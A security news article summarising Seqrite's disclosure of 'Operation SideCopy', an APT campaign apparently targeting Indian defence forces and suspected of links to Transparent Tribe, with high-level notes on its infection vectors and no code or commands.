The intelligence and security reports have claimed that since 2019 the APT group was exploiting the Indian defense unit and Armed forces to steal sensitive information.
The security firm, Seqrite has disclosed this attack, and they have uncovered a new Advanced Persistent Threat (APT) that is generally targeting India’s Defence Forces.
This group was entitled to ‘Operation Sidecopy,’ and the attackers behind this attack were found distorting the security alliance by imitating all Tactics, Procedures, and Methods (TTP). And the security experts at Seqrite have uncovered very definite proof of ‘Operation Sidecopy.’
The proof affirms that having possible links with Pakistan and Transparent Tribe group. Apart from this, it’s one of the breakthrough discoveries that creating Seqrite as the first cybersecurity brand to disclose the real identification and motive of these attackers.
According to the Seqrite report, the main key findings of these operations are:-
- Operation SideCopy is running all its operations from early 2019 to till now.
- The cyber-operation has been only attacking the Indian defense forces, armed forces, and employees.
- Malware modules that have been seen are continually under development, and updated modules are published after surveillance of victim data.
- The attackers are keeping track of malware discoveries and updating modules when exposed by AV.
- Nearly all CNC belongs to Contabo GmbH, and server names are related to machine names found in the Transparent Tribe report.
- The attackers are misleading the security community by imitating TTP that points at the Sidewinder APT group.
- The Seqrite suspect this attacker has links with the Transparent Tribe APT group.
Before summarising the whole attack, Seqrite has mentioned the list of URLs that are connected from “mshta.exe” across multiple customers and here they are:-
Moreover, Seqrite has already started tracking this campaign as it was targeting crucial Indian companies and organizations; not only this, the traces of this operation can be tracked from early 2019 till to the date.
Apart from this, Seqrite has identified three infection chain method; the initial infection vector in two of the chains was the LNK file that came from a malspam. In one case, they observed that the threat actors are making use of template injection attack and equation editor vulnerability (CVE-2017-11882) as the first infection vector.
The initial infection vector is altered in the third case, and the final payload is related to the first two chains.
Infection Chain 1
Infection chain 2
Infection Chain 3
The security experts at Seqrite are still investigating the whole operation very carefully, and they asserted that the attackers who are operating this operation is a sub-division under the Transparent-Tribe APT group and are just imitating the TTP of other attackers to deceive the security communities.